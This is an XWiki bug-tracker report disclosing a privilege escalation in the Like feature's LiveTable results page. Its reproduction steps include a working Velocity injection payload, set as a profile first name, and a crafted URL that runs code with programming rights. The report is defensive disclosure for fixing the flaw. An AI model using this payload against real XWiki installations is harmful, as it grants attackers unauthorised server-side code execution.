Details
-
Bug
-
Resolution: Solved By
-
Blocker
-
12.9-rc-1
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
- In the user profile, set your first name to
{{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)
- Click on the Like-button at the bottom left of your user profile.
- Open <xwiki-host>/xwiki/bin/get/XWiki/Like/Code/LiveTableResultPage?outputSyntax=plain&offset=0&limit=10&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.setContentAuthorReference(%22xwiki%3AXWiki.Admin%22)%20%24mydoc.setTitle(%22Hello%20World%22)%20%24mydoc.getTitle(), where <xwiki-host> is the URL of your XWiki installation.
Expected result:
The property
"doc_title":"Profile of {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)"
is in the JSON.
Actual result:
The property "doc_title":"Profile of Hello World " is in the result, showing that the Velocity code that is passed in the URL parameter eval has been executed with programming rights.
This demonstrates a privilege escalation from account to programming rights due to missing escaping in the LiveTable results page. While this document was introduced in 13.4-rc-1, the same code was also in XWiki.Like.UserProfileUIX in earlier versions so the true affects version is probably older.
Attachments
Issue Links
- is related to
-
XWIKI-19900 Liked page whose FULLNAME contains dot(.) can not show in user profile.
- Closed
-
XWIKI-17733 Use a LiveTable to display the page liked in user profile
- Closed
- links to